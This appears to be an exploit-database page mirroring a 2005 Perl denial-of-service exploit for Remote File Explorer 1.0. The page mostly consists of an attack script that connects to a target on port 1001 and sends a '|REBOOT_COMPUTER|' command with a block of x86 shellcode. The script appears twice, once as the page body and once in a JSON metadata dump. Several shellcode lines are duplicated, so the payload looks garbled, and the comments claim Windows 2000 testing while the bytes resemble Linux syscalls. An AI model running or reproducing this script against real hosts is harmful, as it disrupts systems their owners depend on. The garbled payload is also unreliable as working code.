Search...

Remote File Explorer <= 1.0 Denial of Service Exploit

2005-07-11T00:00:00

ID 1337DAY-ID-6009
Type zdt
Reporter basher13
Modified 2005-07-11T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            =====================================================
Remote File Explorer &lt;= 1.0 Denial of Service Exploit
=====================================================



#!/usr/local/bin/perl
#
#    Remote File Explorer DoS Exploit
# ----------------------------------------
#
# Resolve host... [OK]
#  [+] Connecting... [OK]
# Target locked
# Sending bad procedure... [OK]
#  [+] Server DoS'ed
#
# Tested on Windows2000 SP4
# Info: infamous.2hell.com


[email protected];
if ($ARGC !=1) {
    print "Usage: $0 &lt;host&gt;\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1001"; # default port for the server

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

$sploit = "|REBOOT_COMPUTER|".
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";


$msg = $sploit;
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;




#  0day.today [2018-04-08]  #

JSON Vulners Source

Initial Source

{"published": "2005-07-11T00:00:00", "id": "1337DAY-ID-6009", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category dos / poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-08T01:47:52", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-08T01:47:52", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-04-08T01:47:52", "edition": 2, "title": "Remote File Explorer <= 1.0 Denial of Service Exploit", "href": "https://0day.today/exploit/description/6009", "modified": "2005-07-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/6009", "references": [], "reporter": "basher13", "sourceData": "=====================================================\r\nRemote File Explorer <= 1.0 Denial of Service Exploit\r\n=====================================================\r\n\r\n\r\n\r\n#!/usr/local/bin/perl\r\n#\r\n# Remote File Explorer DoS Exploit\r\n# ----------------------------------------\r\n#\r\n# Resolve host... [OK]\r\n# [+] Connecting... [OK]\r\n# Target locked\r\n# Sending bad procedure... [OK]\r\n# [+] Server DoS'ed\r\n#\r\n# Tested on Windows2000 SP4\r\n# Info: infamous.2hell.com\r\n\r\n\r\n[email\u00a0protected];\r\nif ($ARGC !=1) {\r\n print \"Usage: $0 <host>\\n\";\r\n print \"Example: $0 127.0.0.1\\n\";\r\n exit;\r\n}\r\nuse Socket;\r\n\r\nmy($remote,$port,$iaddr,$paddr,$proto);\r\n$remote=$ARGV[0];\r\n$port = \"1001\"; # default port for the server\r\n\r\n$iaddr = inet_aton($remote) or die \"Error: $!\";\r\n$paddr = sockaddr_in($port, $iaddr) or die \"Error: $!\";\r\n$proto = getprotobyname('tcp') or die \"Error: $!\";\r\n\r\nsocket(SOCK, PF_INET, SOCK_STREAM, $proto) or die \"Error: $!\";\r\nconnect(SOCK, $paddr) or die \"Error: $!\";\r\n\r\n$sploit = \"|REBOOT_COMPUTER|\".\r\n\"\\xeb\\x6e\\x5e\\x29\\xc0\\x89\\x46\\x10\".\r\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\r\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\r\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\r\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\r\n\"\\x80\\x43\\xc6\\x46\\x10\\x10\\x88\\x46\".\r\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\r\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\r\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\r\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\r\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\r\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\r\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\r\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\r\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\r\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\r\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\r\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\r\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\r\n\"\\x3f\\x41\\xcd\\x80\\xb0\\x3f\\x41\\xcd\".\r\n\"\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\".\r\n\"\\xf3\\x8d\\x4b\\x0c\\xb0\\x0b\\xcd\\x80\".\r\n\"\\xe8\\x8d\\xff\\xff\";\r\n\r\n\r\n$msg = $sploit;\r\nprint $msg;\r\nsend(SOCK, $msg, 0) or die \"Cannot send query: $!\";\r\nsleep(1);\r\nclose(SOCK);\r\nexit;\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-08] #"}

Remote File Explorer &lt;= 1.0 Denial of Service Exploit

Description

Exploit for unknown platform in category dos / poc

Remote File Explorer <= 1.0 Denial of Service Exploit